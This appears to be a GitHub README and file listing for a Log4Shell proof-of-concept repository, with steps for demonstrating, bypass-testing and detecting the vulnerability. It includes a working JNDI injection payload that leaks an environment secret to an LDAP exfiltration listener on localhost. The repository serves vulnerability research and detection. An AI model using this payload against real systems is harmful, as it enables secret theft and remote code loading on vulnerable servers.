Log4j vulnerability exploration/proof of concept

Also known as CVE-2021-45046 CVE-20201-44228 #log4shell

How to use

First verify that it works by running test.sh it should print ITWORKS in uppercase for different log levels

cd listener
./ldap-exfil.py

in another terminal run the following and observe the secret key value being leaked to the ldap server

export SECRET_KEY="this_is_a_secret_key"
./vuln.sh error '${jndi:ldap://localhost:8888/${env:SECRET_KEY}}'

You can compare the behaviour of the printf call to the others via:

./mitigator-vuln.sh error '${upper:bypass}'
./mitigator-vuln.sh info '${upper:bypass}'
./mitigator-vuln.sh printf '${upper:bypass}'

graudit -d ./log4shell.db <file_or_dir>

And don't forget to look for the class files (recursively through jar/war/zip files)

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
apache-log4j-2.14.0-bin		apache-log4j-2.14.0-bin
apache-log4j-2.15.0-bin		apache-log4j-2.15.0-bin
listener		listener
215mitigator-vuln.sh		215mitigator-vuln.sh
215vuln.sh		215vuln.sh
README.md		README.md
apache-log4j-2.14.0-bin.tar.gz		apache-log4j-2.14.0-bin.tar.gz
apache-log4j-2.15.0-bin.tar.gz		apache-log4j-2.15.0-bin.tar.gz
build.sh		build.sh
log215bypass.class		log215bypass.class
log215bypass.java		log215bypass.java
log4poc.class		log4poc.class
log4poc.java		log4poc.java
log4shell.db		log4shell.db
mitigator-vuln.sh		mitigator-vuln.sh
test.sh		test.sh
vuln.sh		vuln.sh